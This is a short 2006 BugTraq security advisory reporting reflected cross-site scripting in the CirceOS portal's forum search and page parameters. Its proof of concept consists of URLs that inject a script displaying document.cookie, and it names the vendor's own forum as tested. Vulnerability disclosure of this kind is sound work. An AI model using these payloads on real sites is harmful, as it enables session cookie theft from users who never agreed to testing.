BugTraq
Cireos Portal Cross Site Scripting Apr 28 2006 03:53AM
outlaw aria-security net
#Aria-Security.net Advisory

#Discovered by: O.u.t.l.a.w

#< www.Aria-security.net>

#Gr33t to: A.u.r.a & R@1D3N & Smok3r

#-----------------------------------------------------------

Software: SirceOS Operative Solutions

Link: http://www.circeos.it

Attack method: Cross Site Scripting

advisory:http://www.aria-security.net/portal/circeos.txt

Summary:

cireos is a powerfull Portal and featuring a forum

Proof of Concept:

http://www.victim.com/circeos_path/forum/buscar.php?query=<script>alert(
document.cookie)</script><!--

www.site.com/path/index.php?page=<script>alert(document.cookie)</script>
<!--

Tested On

http://www.circeos.it/forum/index.php

Solution

contact me: Advisory (at) Aria-Security (dot) net [email concealed]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus